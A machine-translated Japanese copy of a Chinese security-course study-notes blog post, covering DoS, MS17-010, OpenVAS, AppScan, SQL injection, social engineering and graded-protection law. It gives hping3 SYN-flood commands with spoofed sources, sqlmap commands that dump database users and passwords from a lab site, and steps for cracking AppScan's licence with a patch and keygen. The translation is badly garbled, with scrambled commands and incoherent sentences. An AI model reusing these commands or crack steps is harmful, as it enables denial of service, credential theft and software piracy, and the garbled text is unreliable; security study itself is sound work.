SQLインジェクション/ソーシャルエンジニアリング6

免責事項：この記事はブロガーオリジナル記事です、続くBY-SAのCC 4.0を著作権契約、複製、元のソースのリンクと、この文を添付してください。

このリンク： https://blog.csdn.net/qq_30787727/article/details/100060405

最終結果が良好で、そうでない場合は、その終わりを示していないすべてのものに準拠！
==========================================
レビュー：
         1、サービス攻撃のDoS攻撃の拒否
              サービス攻撃のDDoS攻撃の分散拒否

          1.1.1.1 -p 3389 -S 192.168.1.1 -a hping3 -i U10

          hping3 -i U10 -p 3389 -S --randソース192.168.1.1

         2.脆弱性- MS12-020 RDPリモートデスクトップ攻撃の脆弱性-----ブルースクリーン
                      -侵入/浸透MS17-010永遠ブルー-----恐喝ウイルス 
                                                               ---アカウント、パスワード、カメラのスクリーンショット、リモートログイン待ちます   

         3、無料openvas ---走査システム、オープンソースは、     
                               ダウンロード、インストールするには、時間がかかります  

                               -表面スキャンタスクを作成する
                               -結果の表示

=======================================
AppScanのWEBサイト脆弱性評価ソフトウェア
                 の中国の 
                 IBMコーポレーション
    ブラウザは、ネットワークの状態を入力します。http：//demo.testfire.net    

   状態のプログラムのウェブサイト@@下でオープンPHPSTUDY迅速な確立が--- [スタート]ボタンをクリック---- 2つの緑のドットは非ネットワーク現れる 
                                LAMP LNMP    
                         @@ HTTP :: //127.0.0.1/sqli-labsブラウザを入力して                       
                         @@新AppScanのオープン表面を掃除-上記のURLを入力します。        
                         @@ビュー安全性報告    
         
ライセンスエラーの解決策を報告した：
1.Installは//ソフトウェアプログラムがインストール
$ AppScanのインストールディレクトリの$にPATCH.EXE 2.copy \プログラムファイル\ IBM：（EXTCのC。 \合理AppScanの）
                              ディレクトリにPATCH.EXEをコピー//
3.RunのPATCH.EXE //ディレクトリで実行PATCH.EXE
4.Run Keygen.exe //次の実行Keygen.exe、たlicense.licを生成  
$ AppScanの5.Copyのdirの$ \ライセンスに設置たlicense.lic（EXTC C :. \プログラムファイル\ IBM \合理的AppScanの\ライセンス）           
                              ディレクトリにコピー//生成したlicense.lic                        
6.runのAppScanのとセキュアを更新データベースは、ITをお楽しみください！ 
                              //プログラムAppScanのを再起動します       

              私はあまり考えると少なすぎるを行います！
              十分な才能の野心を感じます！
              自信！！！------
              だけではない故ん、スタート！！！

。7、SQLインジェクションは、原則：
 ハッカーが制限アプリケーションをバイパスできるように、ユーザーの入力データのない有効性を判断しないために、アプリケーション、データベースに渡されたいくつかのSQLステートメント用に設定して、データベースの操作を実現するために

SQLインジェクションの危険性は：情報を収集するためのデータベースは、
                       データベースを変更、削除、追加するために
                       、データベース、オペレーティング・システムを介して-----大きな害を獲得しました

    ルートの@カーリー：〜＃SQLMAP -u 192.168.0.129/sqli-labs/less-1/?id=1 // サイトがSQLインジェクションの脆弱性があるかどうかを検出
    〜＃SQLMAP -u：ルート@カーリー 192.168.0.129/sqli-labsを？/以下-1 / ID = 1 --dbs // ターゲットウェブサイトの背景情報データベースの表示
    ルートの@カーリーを：〜＃SQLMAP -u 192.168.0.129/sqli-labs/less-1/?id=1 --users // 宛先サイトのバックエンドデータベースアカウントの確認
    、ルートの@カーリーを：〜＃SQLMAP -u 192.168.0.129/sqli-labs/less-1/?id=1 --passwords // 対応するアカウントのパスワードを表示

 8、ソーシャルエンジニアリング：の非技術的な浸透行動の実施の人間の弱さの使用 
                                 人間関係の心理学+

           ハッカー - ミトニック氏のハッカー詐欺の最初------ ---アート      

             
9、ISO9001の品質認証にISO27001マネジメントシステムの認証と同等

    ネットワークセキュリティの重要な部分では、法律の保護レベル

   ネットワークセキュリティ法は、11月に2016年発行の
                    実装を：2017年6月  

   保護の五のアクションレベル：分類、ファイリング、整流、評価、監督と検査
 
   グレーディングプロセス：Sクラス-ビジネス情報クラス    
                          クラス-クラスのサービスシステム

                         クラスSクラスは、任意の等級の最高レベルを取ります！